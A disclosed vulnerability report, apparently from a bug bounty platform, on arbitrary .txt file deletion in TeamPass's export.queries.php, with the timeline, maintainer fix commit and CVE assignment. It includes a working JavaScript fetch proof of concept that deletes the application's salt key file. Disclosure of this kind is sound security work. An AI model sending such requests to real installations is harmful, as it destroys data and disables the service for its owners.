Arbitrary txt files deletion (authenticated) in nilsteampassnet/teampass

Valid

Reported on

Jan 21st 2023

Description

The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary txt files. If the system administrator configured the base path for the teampass-seckey.txt to be /var/teampass, as shown in the official example, it is possible to remove it causing a total disruption of the application (all the pages will return 500 Internal Server Error).

When the attack is executed the original .txt file is deleted and a new file named as the deleted one but without the extension is created. The new file will contain some HTML and the content of the original file encrypted by a password chosen by the attacker, making the recovering of the original file impossible.

Proof of Concept

The following PoC assumes that the Teampass SaltKey is stored to /var/teampass/teampass-seckey.txt.

Login with any user (no special permission is required), open a browser console and execute the following JavaScript:

fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',
        pdf_password: 'GoodbyeSecretKey'
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
})

Impact

This vulnerability can be used by an attacker with low privileges to remove arbitrary txt files. It can lead to a total loss of availability if the path of the teampass-seckey.txt is known.

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 2 months ago
Sonia Zorba modified the report
2 months ago
Sonia Zorba
2 months ago

Researcher

@admin I'm trying to submit a similar one for version 2.1.27.36 (that looks to be the last Teampass 2 supported version). A pop-up opens complaining about "It looks like you're trying to report multiple occurrences of a vulnerability you've already disclosed" and forces me to edit this submission. The vulnerability that I was trying to submit is almost the same, but for version 2 is more critical since it can be performed also by anonymous users and so has an higher CVSS score. Also the PoC is different. How should I proceed? Thanks

We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 2 months ago
We have sent a follow up to the nilsteampassnet/teampass team. We will try again in 7 days. 2 months ago
nilsteampassnet
2 months ago

Maintainer

@admin I will fix the issue in branch 3. Branch 2 is not maintained anymore.

nilsteampassnet/teampass maintainer has acknowledged this report 2 months ago
nilsteampassnet
2 months ago

Maintainer

@zonia3000, Fix has been released in commit https://github.com/nilsteampassnet/TeamPass/commit/0af3574caba27a61b16dc25c94fa51ae12d2d967

nilsteampassnet gave praise 2 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
nilsteampassnet validated this vulnerability a month ago
Sonia Zorba has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
nilsteampassnet marked this as fixed in 3.0.0.22 with commit 0af357 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
nilsteampassnet published this vulnerability a month ago
Sonia Zorba
a month ago

Researcher

Thank you @nilsteampassnet!

to join this conversation